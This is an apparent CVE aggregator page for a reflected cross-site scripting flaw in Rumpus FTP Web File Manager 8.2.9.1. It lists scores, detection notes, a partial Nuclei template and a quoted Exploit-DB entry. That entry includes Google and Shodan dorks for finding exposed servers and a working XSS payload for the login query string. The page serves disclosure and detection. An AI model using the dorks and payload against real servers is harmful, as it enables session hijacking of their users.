CVE-2019-19368
published 2019-12-16CVE-2019-19368: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link…
PriorityP349medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
21.02%
97.3th percentile
A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maxum | rumpus | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Google Dork can be used to identify exposed Rumpus FTP Web File Manager instances ↗
- →Shodan Dork can be used to identify Rumpus FTP servers by their HTTP Server header ↗
- →The XSS payload is reflected via the Login page query string; monitor HTTP GET requests to /Login containing script-injection patterns such as SVG/onload event handlers ↗
- →Detection template checks for HTTP 200 response on GET request to /Login with the crafted XSS payload in the query string ↗
- ·Vulnerability is confirmed only on version 8.2.9.1; other versions are not specified as affected ↗
- ·The exploit was tested on both Windows and Mac platforms ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
exploitdb·2019-12-18·CVSS 6.1
CVE-2019-19368 [MEDIUM] Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
---
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.
Nuclei
Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-19368 [MEDIUM] Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
Template:
id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
author: madrobot
severity: medium
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defac
No writeups or analysis indexed.
http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.htmlhttps://github.com/harshit-shukla/CVE-2019-19368/https://www.maxum.com/Rumpus/Download.htmlhttp://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.htmlhttps://github.com/harshit-shukla/CVE-2019-19368/https://www.maxum.com/Rumpus/Download.html
2019-12-16
Published